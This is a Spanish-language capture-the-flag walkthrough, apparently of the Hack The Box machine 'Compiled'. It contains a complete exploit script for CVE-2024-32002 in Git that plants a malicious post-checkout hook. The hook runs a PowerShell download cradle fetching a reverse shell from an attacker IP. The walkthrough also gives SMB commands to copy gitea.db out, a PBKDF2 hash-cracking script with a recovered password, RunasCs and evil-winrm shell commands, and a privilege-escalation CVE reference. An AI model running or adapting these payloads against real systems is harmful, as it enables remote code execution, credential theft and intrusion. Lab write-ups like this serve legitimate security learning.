Compiled

---

---

Enumeramos:

   1   │ # Nmap 7.95 scan initiated Sun Jul 13 07:15:57 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p5000,7680,3000 -oN targeted 10.10.11.26
   2   │ Nmap scan report for 10.10.11.26
   3   │ Host is up (0.27s latency).
   4   │ 
   5   │ PORT     STATE SERVICE    VERSION
   6   │ 3000/tcp open  http       Golang net/http server
   7   │ |_http-title: Git
   8   │ | fingerprint-strings: 
   9   │ |   GenericLines, Help, RTSPRequest: 
  10   │ |     HTTP/1.1 400 Bad Request
  11   │ |     Content-Type: text/plain; charset=utf-8
  12   │ |     Connection: close
  13   │ |     Request
  14   │ |   GetRequest: 
  15   │ |     HTTP/1.0 200 OK
  16   │ |     Cache-Control: max-age=0, private, must-revalidate, no-transform
  17   │ |     Content-Type: text/html; charset=utf-8
  18   │ |     Set-Cookie: i_like_gitea=4f23d8a22276e4f2; Path=/; HttpOnly; SameSite=Lax
  19   │ |     Set-Cookie: _csrf=avkB9vaKtwdWtmUWZdYpJsJhoMI6MTc1MjM4Mzc2NjkzODEyMDkwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
  20   │ |     X-Frame-Options: SAMEORIGIN
  21   │ |     Date: Sun, 13 Jul 2025 05:16:06 GMT
  22   │ |     <!DOCTYPE html>
  23   │ |     <html lang="en-US" class="theme-arc-green">
  24   │ |     <head>
  25   │ |     <meta name="viewport" content="width=device-width, initial-scale=1">
  26   │ |     <title>Git</title>
  27   │ |     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5
       │ odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEy
       │ In0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
  28   │ |   HTTPOptions: 
  29   │ |     HTTP/1.0 405 Method Not Allowed
  30   │ |     Allow: HEAD
  31   │ |     Allow: GET
  32   │ |     Cache-Control: max-age=0, private, must-revalidate, no-transform
  33   │ |     Set-Cookie: i_like_gitea=c74319d000e9419d; Path=/; HttpOnly; SameSite=Lax
  34   │ |     Set-Cookie: _csrf=nZMk-QvNQNoqBacqboU2KvzdOxY6MTc1MjM4Mzc2ODY3NjgwMDEwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
  35   │ |     X-Frame-Options: SAMEORIGIN
  36   │ |     Date: Sun, 13 Jul 2025 05:16:08 GMT
  37   │ |_    Content-Length: 0
  38   │ 5000/tcp open  http       Werkzeug httpd 3.0.3 (Python 3.12.3)
  39   │ |_http-title: Compiled - Code Compiling Services
  40   │ |_http-server-header: Werkzeug/3.0.3 Python/3.12.3
  41   │ 7680/tcp open  pando-pub?
  42   │ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submi
       │ t.cgi?new-service :
  43   │ SF-Port3000-TCP:V=7.95%I=7%D=7/13%Time=68734115%P=x86_64-pc-linux-gnu%r(Ge
  44   │ SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
  45   │ SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
  46   │ SF:20Request")%r(GetRequest,2A84,"HTTP/1\.0\x20200\x20OK\r\nCache-Control:
  47   │ SF:\x20max-age=0,\x20private,\x20must-revalidate,\x20no-transform\r\nConte
  48   │ SF:nt-Type:\x20text/html;\x20charse

---

En la Exploresección de Gitea encontramos dos repositorios, uno para la web en el puerto 5000 y otro para un programa calculador.

En el repositorio de calculadoras encontramos una versión para Git (2.45.0.windows.1).

Git (2.45.0.windows.1)

Buscamos el exploit para la version:

Exploiting CVE-2024-32002: RCE via git cloneAmal Murali

Explicacion:

Explicación del exploit

Nuestro proceso de explotación aprovecha una vulnerabilidad en Git (CVE-2024-32002) derivada del manejo inadecuado de enlaces simbólicos en sistemas de archivos que no distinguen entre mayúsculas y minúsculas (lo que significa que las rutas como A/modules/xy a/modules/xcomo se tratan de forma idéntica). Esta vulnerabilidad nos permite manipular Git para que escriba archivos en el .git/directorio de nuestro submódulo en lugar del árbol de trabajo previsto.

El proceso implica la creación de un repositorio malicioso ( scorpion) con un gancho posterior a la extracción que contiene una carga útil de shell inversa. Este gancho está configurado para ejecutarse durante operaciones específicas de Git, como la extracción. Luego, usamos [ git submodule addpara vincular] scorpioncomo un submódulo de otro repositorio. venomEsto garantiza que, al procesarse el submódulo, scorpionse active la carga útil.

Una parte crítica del exploit consiste en explotar la autorización de Git para actualizar el .git/directorio mediante enlaces simbólicos. Al crear un enlace simbólico que apunta a [nombre del directorio] dotgit.txt, engañamos a Git para que trate el contenido manipulado como metadatos legítimos. Esto evita las comprobaciones de validación, lo que nos permite colocar nuestra carga útil de shell inversa en el .git/hooksdirectorio.

Finalmente, enviamos la URL del venomrepositorio a la aplicación de destino que clona y compila los repositorios. Durante el proceso de clonación, Git procesa el submódulo y encuentra el gancho malicioso post-checkout en scorpion. Este gancho ejecuta nuestra carga útil de shell inversa, estableciendo una conexión con nuestro receptor.

---

Script adaptalo según tus necesidades:

#!/bin/bash

# Configure Git settings for exploitation
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

# Clone the malicious repository (scorpion)
git clone http://compiled.htb:3000/12345678lass/scorpion.git
cd scorpion

# Set up the post-checkout hook with the reverse shell payload
mkdir -p y/hooks
cat >y/hooks/post-checkout <<EOF
#!/bin/sh
powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.16.10:8000/reverse.ps1')" 
EOF

# Make the hook executable
chmod +x y/hooks/post-checkout

# Commit the hook to the repository
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push

# Clone the venom repository and add the malicious submodule
cd ..
git clone http://compiled.htb:3000/12345678lass/venom.git
cd venom
git submodule add --name x/y "http://compiled.htb:3000/12345678lass/scorpion.git" A/modules/x

# Commit and push the submodule addition
git commit -m "add-submodule"
printf ".git" >dotgit.txt
git hash-object -w --stdin <dotgit.txt >dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" >index.info
git update-index --index-info <index.info
git commit -m "add-symlink"
git push// Some code

---

Una vez creados tus dos repositorios ejecuta el script modificado:

Ante todo tienes que estar con servidor puede ser en python la revershell:

Y en la escucha por el puerto especificado:

---

Muy bien adentro en el directorio de Gitea se enuentra una .db: C:\Program Files\Gitea\data

Lo transferimos a nuestra mquina de atacante con impacket-smbserver:

impacket-smbserver smbFolder $(pwd) -smb2support
copy "C:\Program Files\Gitea\data\gitea.db" \\10.10.16.10\smbFolder\gitea.db

Analizamos la base de datos:

sqlite3 gitea.db

.tables

select * FROM user;

Hashes PBKDF2

🔓 Crackeo de contraseñas

Para ello usaremos un scirpt en python:

❯ cat --plain contra.py
import hashlib

def pbkdf2_crack(hash_value, salt, iterations, key_length, wordlist_path):
    # Convertir a bytes
    salt_bytes = bytes.fromhex(salt)
    hash_bytes = bytes.fromhex(hash_value)

    # Abrir el diccionario
    with open(wordlist_path, 'r', encoding='utf-8', errors='ignore') as file:
        for password in file:
            password = password.strip()
            derived = hashlib.pbkdf2_hmac('sha256', password.encode(), salt_bytes, iterations, dklen=key_length)
            if derived == hash_bytes:
                print(f"[+] Contraseña encontrada: {password}")
                return password
    print("[-] Contraseña no encontrada en el diccionario.")
    return None

# Ejemplo con el hash de EMILY
hash_val = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
salt = '227d873cca89103cd83a976bdac52486'
iterations = 50000
key_len = 50
wordlist = '/usr/share/wordlists/rockyou.txt'

pbkdf2_crack(hash_val, salt, iterations, key_len, wordlist)

❯ python3 contra.py

[+] Contraseña encontrada: 12345678

---

Teniendo la contraseña:

Runascs comandos

Podemos utilizar RunasCs.exepara obtener un shell como Emilycon el comando a continuación.

.\RunasCs.exe Emily "12345678" powershell -r 10.10.16.10:443

---

También es posible entrar por evil-winrm:

evil-winrm -u "Emily" -p "12345678" -i compiled.htb

---

Escalada de privilegios

---

Confirmar la versión vulnerable de Visual Studio 16.10.0

& "C:\Program Files (x86)\Microsoft Visual Studio\Installer\vswhere.exe" -property catalog_productDisplayVersion

Lo cual es vulnerable a CVE-2024-20656.

GitHub - Wh04m1001/CVE-2024-20656GitHub

---